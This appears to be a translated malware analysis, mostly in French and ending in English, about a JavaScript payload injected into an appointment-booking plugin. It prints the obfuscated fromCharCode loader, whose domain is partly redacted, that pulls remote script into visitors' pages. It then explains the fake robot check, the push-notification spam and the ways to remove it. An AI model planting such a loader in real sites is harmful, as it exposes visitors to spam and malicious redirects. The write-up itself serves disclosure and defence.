Charge malveillante dans le plugin de réservation de rendez-vous
Après notre enquête, nous avons découvert que la charge malveillante était similaire à celle répertoriée dans notre article de la base de connaissances Labs de juillet 2019.
var nt = String.fromCharCode(115,115,115,111,108);var mb = String.fromCharCode(97, 106, 97, 120, 67, 111, 117, 110, 116, 101, 114);var sb = String.fromCharCode(115, 99, 114, 105, 112, 116);var jb = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47); var tb = String.fromCharCode(116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116);var lb = String.fromCharCode([redacted]122,111,110,101,105,100,61,53,55,52,53,55,38,117,116,109,95,99,61,49,38,103,114,111,61);var c=document.createElement(sb);c.type=tb,c.async=1,c.src=jb+lb+nt;var n=document.getElementsByTagName(sb)[0];n.parentNode.insertBefore(c,n);
Cette charge utile JavaScript malveillante a été trouvée injectée dans la partie éditeur du plug-in de réservation de rendez-vous, ce qui a provoqué le chargement de code par des sources tierces avec chaque calendrier généré par le plug-in.
Tout utilisateur visitant une page avec ce plugin de calendrier est finalement redirigé vers une page Web à l'aide d'un faux vérificateur de vérification humaine (JavaScript doit être activé).
Invites de notification et chaînes de redirection
La page trompeuse indique au visiteur de prouver qu'il ne s'agit pas d'un robot en cliquant sur «Autoriser» dans l'invite de notification de son navigateur Web.
Une fois que le visiteur a sélectionné “Autoriser” ou “Bloquer” dans l'invite de notification, il est à nouveau redirigé et se retrouve sur un nombre quelconque de sites Web promus par la campagne.
Toute l'expérience des visiteurs, du processus de vérification à la chaîne de redirection, est visible ici.
Comportement des notifications push et étapes d'atténuation
Si le visiteur ne clique pas sur «Autoriser» dans l'invite de notification push de son navigateur Web, il lui suffit de quitter l'onglet du navigateur pour éviter toute redirection supplémentaire depuis le site Web hébergeant le faux outil de vérification humaine.
Toutefois, si le visiteur clique sur «Autoriser», ses problèmes ne s'arrêteront pas à une simple redirection vers un site Web suspect. Ils commenceront à recevoir des notifications de spam de leur navigateur Web et seront redirigés vers des sites Web malveillants s’ils cliquent sur la notification. Si le visiteur utilise un navigateur Web (par exemple, Google Chrome) pouvant continuer à fonctionner en arrière-plan, ces notifications de rejet de spam continueront de se produire même après la fermeture de la fenêtre du navigateur Web / de l'application.
If you are currently receiving these types of spam push notifications, this does not necessarily indicate an infection of your device, but rather just modified notification settings inside your web browser.
To stop the spammy push notifications, navigate into your web browser and remove the suspicious websites from your notifications list.
If you want to entirely prevent any push notifications to your browser, slide the Chrome browser option to “Block” instead of the default “Ask” option, preventing the prompt dialog seen in the fake human verification.